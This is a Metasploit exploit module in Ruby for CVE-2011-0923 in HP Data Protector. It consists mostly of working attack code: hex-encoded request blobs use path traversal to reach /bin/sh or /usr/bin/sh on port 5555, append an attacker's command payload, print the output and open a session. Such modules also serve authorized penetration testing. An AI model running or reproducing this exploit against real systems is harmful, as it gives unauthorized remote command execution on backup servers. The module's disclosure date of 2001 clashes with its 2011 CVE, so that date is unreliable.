##
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

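class MetasploitModule < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp

	# Seconds to wait for the service to answer after the request is sent.
	RESPONSE_TIMEOUT = 5

	# Request bytes shared by both targets (the first 128 bytes of the
	# request published at http://www.exploit-db.com/exploits/17648/),
	# kept byte-for-byte. Only the trailing shell path and NUL padding
	# differ per target (see UNIX_REQUEST / HPUX_REQUEST).
	#
	# Ascii conversion of the full Unix request, as given in the original:
	# ""+
	# "\x00\x00\x00\xa4\x20"+"2"+"\x00\x20"+"--ch0ks-"+
	# "\x00\x20\x00"+"0"+"\x20"+"SYSTEM"+"\x00\x20"+"-ch0ks--"+"\x00\x20"+"C"+"\x00\x20"+"20"+"\x00\x20"+
	# "--ch0ks-"+"\x00\x20"+"Poc"+"\x00\x20"+"-r00t-r00t-"+
	# "\x00\x20"+"-r00t-r00t-"+"\x00\x20"+"-r00t-r00t-"+"\x00\x20\x00"+"0"+"\x20\x00"+
	# "0"+"\x20"+"../../../../../../../../../bin/sh"+
	# "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
	# "\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	REQUEST_PREFIX = [
		"\x00\x00\x00\xa4\x20\x32\x00\x20\x2d\x2d\x63\x68\x30\x6b\x73\x2d",
		"\x00\x20\x30\x00\x20\x53\x59\x53\x54\x45\x4d\x00\x20\x2d\x63\x68",
		"\x30\x6b\x73\x2d\x2d\x00\x20\x43\x00\x20\x32\x30\x00\x20\x2d\x2d",
		"\x63\x68\x30\x6b\x73\x2d\x00\x20\x50\x6f\x63\x00\x20\x2d\x72\x30",
		"\x30\x74\x2d\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d",
		"\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d\x72\x30\x30",
		"\x74\x2d\x00\x20\x30\x00\x20\x30\x00\x20\x2e\x2e\x2f\x2e\x2e\x2f",
		"\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e"
	].join.freeze

	# Full request for the 'Unix' target (shell path ../../bin/sh, padded
	# with NULs); identical to the original per-target blob.
	UNIX_REQUEST = (REQUEST_PREFIX + [
		"\x2e\x2f\x2e\x2e\x2f\x62\x69\x6e\x2f\x73\x68\x00\x00\x00\x00\x00",
		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",
		"\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	].join).freeze

	# Full request for the 'HPUX' target (shell path ../../usr/bin/sh,
	# padded with NULs), from http://www.exploit-db.com/exploits/17614/;
	# identical to the original per-target blob.
	HPUX_REQUEST = (REQUEST_PREFIX + [
		"\x2e\x2f\x2e\x2e\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x68\x00",
		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",
		"\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	].join).freeze

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Command Execution on HP Dataprotector',
			'Description'    => %q{
						This module exploits the vulnerability in HP Dataprotector
						to execute the command.
					},
			'Author'         =>
					[
						'SZ',		# original exploit discovery
						'Sohil Garg' 	# ported to metasploit
					],
			'License'        => MSF_LICENSE,
			'References'     =>
				[
					['CVE', '2011-0923'],
					#['OSVDB', 'NA'],
					['URL', 'http://www.exploit-db.com/exploits/17648/'],
				],
			'Platform'       => ['unix'], # win
			'Arch'           => ARCH_CMD,
			'Privileged'     => false,
			'Targets'        =>
				[
					[ 'Unix', { }],
					[ 'HPUX', { }],
				],

			'Payload'        =>
				{
					'Space'       => 1024,
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl telnet',
						}
				},
			# NOTE(review): the year here disagrees with the 2011 CVE id above - confirm against the reference
			'DisclosureDate' => 'Feb 28 2001'))

		register_options(
			[
				Opt::RPORT(5555)
			], self.class)
	end

	# Sends the selected target's fixed request with the encoded cmd payload
	# appended, prints whatever the service answers, then hands the session
	# to the payload handler. The target is validated before any connection
	# is opened, and the socket is closed on every exit path.
	#
	# @raise [RuntimeError] via fail_with when the target is neither 'Unix' nor 'HPUX'
	def exploit
		request = request_for_target

		connect
		print_status("Connected to #{rhost}:#{rport}...")
		sock.put(request + payload.encoded + ";\n")

		# Whatever the remote service sends back within the timeout is echoed
		# to the console unchanged; nil means nothing arrived in time.
		res = sock.get_once(-1, RESPONSE_TIMEOUT)
		if res
			print_line("Command Output:\n#{res}")
		else
			print_status("No response received within #{RESPONSE_TIMEOUT} seconds")
		end

		handler
	ensure
		# Runs after handler on the normal path, and also when connect/put/get raise.
		disconnect
	end

	private

	# Picks the request blob matching the selected target name, failing the
	# run (instead of sending nil) for any other target.
	def request_for_target
		case target.name
		when /Unix/ then UNIX_REQUEST
		when /HPUX/ then HPUX_REQUEST
		else fail_with(Failure::NoTarget, "No request defined for target '#{target.name}'")
		end
	end
end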

=begin
pull request #169
=end
